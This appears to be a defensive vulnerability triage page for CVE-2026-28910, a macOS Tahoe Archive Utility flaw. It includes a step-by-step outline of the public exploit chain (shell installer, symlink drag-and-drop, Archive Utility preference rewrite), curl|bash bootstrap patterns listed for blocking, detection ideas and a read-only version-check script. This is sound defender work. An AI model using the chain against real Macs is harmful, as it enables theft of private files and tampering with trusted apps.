CVE-2026-28910 · This issue was addressed with improved permissions checking.

01 · The Real Story

This is a master key hidden inside a janitor cart, but the attacker still has to get invited into the building first

CVE-2026-28910 is an Archive Utility permission-checking flaw in macOS Tahoe 26.0 through 26.3 that Apple fixed in macOS Tahoe 26.4. Apple describes it as a malicious app being able to access arbitrary files, and the public Mysk research shows a practical chain that can read files from app containers, reach TCC-protected locations like ~/Desktop and ~/Documents, and tamper with third-party app bundles.

Apple's LOW / 3.3 rating is too charitable for the *impact* but too generous for the *reachability*. In real fleets this is not initial access: the attacker needs code execution as the user and a very specific drag-and-drop action, which is meaningful friction; but once that hurdle is cleared, the blast radius is far beyond a routine low-grade local info leak, so I upgrade it to MEDIUM.

"Public PoC and broad data access make this more than a LOW, but it still starts with local code execution and user help."

02 · The Attack Path

4 steps from start to impact.

STEP 01

Get user-level code running with pb2au-style installer

The public research uses a social-engineered installer flow where the victim runs a shell script in Terminal without sudo. The script sets up the later abuse path and does not need privilege escalation, so the attacker only needs normal user execution. Weaponized technique names in the public write-up are pb2au and au-cp.

Conditions required:

Target is running macOS Tahoe 26.0-26.3
Victim executes attacker-supplied code as their own user
Terminal or equivalent script execution is permitted

Where this breaks in practice:

This is already post-initial-access or requires a successful user-execution phish
App control, Gatekeeper policy, developer-tool restrictions, or EDR can kill the chain here
Non-technical users are less likely to paste shell bootstrap commands than developer-heavy cohorts

Detection/coverage: Good EDR coverage for curl|bash, suspicious sh/bash child processes, DMG mount activity, and script-driven Terminal execution. Traditional vuln scanners do not see this step.

STEP 02

Abuse drag-and-drop to grant Terminal access to Archive Utility preferences

The attacker then tricks the user into dragging what looks like an app or installer artifact, but is really an alias/symlink that grants Terminal access to com.apple.archiveutility.plist. That access is the bridge into changing Archive Utility behavior without elevated privileges.

Conditions required:

Interactive user present
User performs the drag-and-drop action
Attacker can present the alias/symlink convincingly enough to pass as a normal install step

Where this breaks in practice:

This is a second, specific social-engineering step despite the vendor vector claiming UI:N
Managed users may notice the Terminal window or odd drag target
Security awareness, app-install restrictions, and EDR-assisted user prompts reduce success rate

Detection/coverage: Native remote detection is weak. Hunt for access to ~/Library/Containers/com.apple.archiveutility/Data/Library/Preferences/com.apple.archiveutility.plist, suspicious alias/symlink creation, and installer flows that stage fake Applications-folder drag-and-drop behavior.

STEP 03

Rewrite Archive Utility behavior with defaults and trigger au-cp

With access to the preference file, the attacker uses defaults write com.apple.archiveutility ... and open -a "Archive Utility" to steer Archive Utility into archiving and rehydrating protected files into attacker-controlled locations. The public au-cp sequence demonstrates copying data out of app containers and bypassing intended access boundaries.

Conditions required:

Archive Utility present and vulnerable
Preference file writable via the granted access path
Target files are reachable through the vulnerable Archive Utility flow

Where this breaks in practice:

Only vulnerable Tahoe builds are affected
SIP still limits some protected system areas
The sequence is noisy enough for a decent EDR rule once you know what to look for

Detection/coverage: Moderate detection opportunity: alert on defaults write com.apple.archiveutility, headless/noninteractive Archive Utility launches, and Archive Utility touching protected container paths. Vulnerability scanners remain mostly version-only.

STEP 04

Steal data or tamper with trusted apps

The practical end state is not just low-value file disclosure. Public research shows access to Notes, Messages, Safari, Mail, WhatsApp, Telegram, and TCC-protected folders, plus replacement of executables inside app bundles under /Applications for persistence or impersonation.

Conditions required:

Interesting user data exists on the host
Attacker has a path to exfiltrate data or wait for the user to launch a tampered app
Some targets may require follow-on prompts for keychain or TCC-protected operations

Where this breaks in practice:

Some high-value follow-on actions still hit keychain prompts or app-specific protections
DLP, EDR, and outbound controls may catch bulk exfiltration
Blast radius is largely endpoint-local rather than tenant-wide or wormable

Detection/coverage: Good downstream detection if you monitor unusual reads from app containers, archive files staged from protected paths, app bundle modification under /Applications, and subsequent outbound transfers. No meaningful external scanner coverage.

03 · Intelligence Metadata

The supporting signals.

In-the-wild status	I found no Apple, NVD, CISA KEV, or researcher evidence of active exploitation. This looks like a publicly documented local post-execution chain, not a live mass-exploitation event.
Proof-of-concept availability	Yes. Mysk published a detailed public write-up with named exploit primitives `au-cp` and `pb2au`, plus step-by-step attack logic that is enough for a competent operator to reproduce.
EPSS	0.0001 (user-provided intel; third-party dashboards show roughly 0.00015 / 0.01%). Either way, the forecast is near the floor and matches a local, socially assisted attack path.
KEV status	Not listed in the CISA Known Exploited Vulnerabilities Catalog.
CVSS vector reality check	`CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` correctly captures local and low-privilege exposure, but the public exploit chain is not really `UI:N`; it needs a user to run code and perform a specific drag-and-drop. At the same time, the practical blast radius is stronger than the CVSS confidentiality-only label suggests.
Affected versions	NVD CPE data marks macOS 26.0 through before 26.4 as affected. Apple lists the product as macOS Tahoe.
Fixed version	macOS Tahoe 26.4. Apple released the security content for that build on 2026-03-24 and later added the CVE entry on 2026-05-11.
Exposure/scanning reality	This is a local OS component issue. Shodan/Censys/FOFA-style internet exposure data is not useful here; your real exposure is simply the count of Tahoe 26.0-26.3 Macs in fleet, especially developer and power-user populations willing to run bootstrap scripts.
Disclosure and researchers	Disclosed 2026-05-11. Apple credits Talal Haj Bakry and Tommy Mysk of Mysk Inc. and Zhongquan Li.
Practical impact	Public research claims access to app containers, TCC-protected folders, and third-party app bundles. That makes this an endpoint privacy and persistence problem, not just a harmless local metadata leak.

04 · The Call

noisgate verdict.

Final Verdict

↑ UPGRADED to MEDIUM (5.9/10)

The decisive friction is that the attacker must already have user-level code execution and then win a second, specific drag-and-drop action. That makes this a post-user-execution local bug, but the public PoC materially amplifies impact into meaningful data theft and app tampering, so LOW is too soft.

HIGH Affected version range and fixed build

MEDIUM Enterprise exploitability after user-execution

MEDIUM Practical blast radius described by public research

Why this verdict

Upgrade for impact: public research shows practical access to app containers, TCC-protected folders, and application bundles, which is much nastier than a routine low-grade local disclosure bug.
Downgrade for attacker position: exploitation starts only after the attacker gets local code running as the user. That is not initial access; it is post-execution on a single Mac.
Downgrade for user choreography: despite the vendor vector's UI:N, the published chain needs the victim to run a script and perform a very specific drag-and-drop. Each extra human step compounds failure rate in managed fleets.
Downgrade for exposure population: the vulnerable set is limited to Tahoe 26.0-26.3, not all supported Apple operating systems or all macOS branches.
No live-fire amplifier: there is no KEV listing and I found no credible active exploitation reporting, which removes the biggest reason to push this into HIGH.

Why not higher?

This is not remotely reachable, not wormable, and not one-click reliable. The attacker needs either a prior foothold or a successful user-execution phish, then a second tailored user action, so the real exposed population is far narrower than a network service bug or a drive-by browser exploit.

Why not lower?

Calling this LOW ignores what the public PoC actually does once it lands: broad endpoint data access and app tampering across trusted local boundaries. In a developer-heavy Mac fleet, users who normalize curl|bash install patterns make this chain practical enough that backlog-only treatment is too relaxed.

05 · Compensating Control

What to do — in priority order.

Block unsanctioned shell-bootstrap installs — Use MDM, application control, or EDR policy to curb curl|bash, sh -c "$(curl ...)", and similar bootstrap patterns on managed Macs. For a MEDIUM verdict there is no mitigation SLA; apply this in the normal hardening cycle, while still planning to patch affected hosts within the 365-day remediation window.
Hunt for Archive Utility preference tampering — Create detections for defaults write com.apple.archiveutility, suspicious access to com.apple.archiveutility.plist, noninteractive open -a "Archive Utility", and archive operations against app-container paths. There is no mitigation SLA for MEDIUM, so treat this as targeted detection engineering rather than an emergency rollout.
Constrain risky Terminal usage on user endpoints — Developer tooling exceptions aside, reduce who can run arbitrary shell installers and mount unsigned DMGs. This does not replace patching, but it cuts the exact social-engineering path the public PoC depends on; roll it out through normal endpoint control changes and remediate vulnerable Tahoe builds within 365 days.
Inventory Tahoe 26.0-26.3 in MDM — Make the problem measurable: identify Macs on the affected version range, then sort by user cohort, privilege, and data sensitivity. Since this is MEDIUM, there is no mitigation SLA — go straight to remediation planning and clear the affected population inside the 365-day patch window.

What doesn't work

A WAF, NGFW, or perimeter scanner does nothing here because this is not a network-reachable service flaw.
Relying on TCC prompts alone is not enough; the public research shows access can still succeed even when the user chooses Don't Allow.
A generic version-only vulnerability scan helps with inventory, but it does not stop the exploit chain or tell you whether users are exposed to the social-engineering preconditions.

06 · Verification

Crowdsourced verification payload.

Run this on the target Mac itself from Terminal, locally or through your MDM/remote shell. Invoke it as bash check-cve-2026-28910.sh; it needs no admin privileges and reports VULNERABLE, PATCHED, or UNKNOWN based on the installed macOS version.

noisgate-verify.sh

BASHREAD-ONLYSAFE

#!/bin/bash
# check-cve-2026-28910.sh
# Determine likely exposure to CVE-2026-28910 by macOS version.
# Affected according to NVD/Apple: macOS Tahoe 26.0 through 26.3
# Fixed: macOS Tahoe 26.4
# Exit codes: 0=PATCHED, 1=VULNERABLE, 2=UNKNOWN

set -u

ver_ge() {
  # returns 0 if $1 >= $2
  local IFS=.
  local i
  local -a va vb
  read -r -a va <<< "$1"
  read -r -a vb <<< "$2"
  local len=${#va[@]}
  if [ ${#vb[@]} -gt "$len" ]; then
    len=${#vb[@]}
  fi
  for ((i=0; i<len; i++)); do
    local a=${va[i]:-0}
    local b=${vb[i]:-0}
    if ((10#$a > 10#$b)); then
      return 0
    fi
    if ((10#$a < 10#$b)); then
      return 1
    fi
  done
  return 0
}

ver_lt() {
  # returns 0 if $1 < $2
  if ver_ge "$1" "$2"; then
    return 1
  else
    return 0
  fi
}

if [ "$(uname -s 2>/dev/null)" != "Darwin" ]; then
  echo "UNKNOWN - not running on macOS"
  exit 2
fi

if ! command -v sw_vers >/dev/null 2>&1; then
  echo "UNKNOWN - sw_vers not available"
  exit 2
fi

VER="$(sw_vers -productVersion 2>/dev/null)"
if [ -z "$VER" ]; then
  echo "UNKNOWN - unable to read macOS version"
  exit 2
fi

# Optional sanity check: Archive Utility should exist on macOS.
ARCHIVE_APP="/System/Library/CoreServices/Applications/Archive Utility.app"
if [ ! -d "$ARCHIVE_APP" ]; then
  echo "UNKNOWN - Archive Utility not found at expected path; macOS version is $VER"
  exit 2
fi

if ver_ge "$VER" "26.0" && ver_lt "$VER" "26.4"; then
  echo "VULNERABLE - macOS $VER is in the affected range for CVE-2026-28910"
  exit 1
fi

if ver_ge "$VER" "26.4"; then
  echo "PATCHED - macOS $VER includes the fix for CVE-2026-28910"
  exit 0
fi

# Versions below 26.0 are outside the published affected range.
echo "PATCHED - macOS $VER is outside the published affected range for CVE-2026-28910"
exit 0

07 · Bottom Line

If you remember one thing.

TL;DR

Monday morning: pull an MDM inventory for macOS Tahoe 26.0-26.3, then rank those Macs by user behavior risk, especially developer and power-user endpoints where shell bootstrap installs are normal. Under the noisgate mitigation SLA, there is no mitigation SLA — go straight to the 365-day remediation window for this MEDIUM issue; under the noisgate remediation SLA, get affected Macs to macOS Tahoe 26.4 within 365 days, while using routine hardening and detection work to squeeze down the social-engineering path in the meantime.

Sources

Peer Review

What defenders are saying.

Submit a review attribution: handle + country only

0 flags selected · stored anonymously

Validation Results

Crowdsourced verification outputs.

Results submitted by users who ran the verification payload against their environment.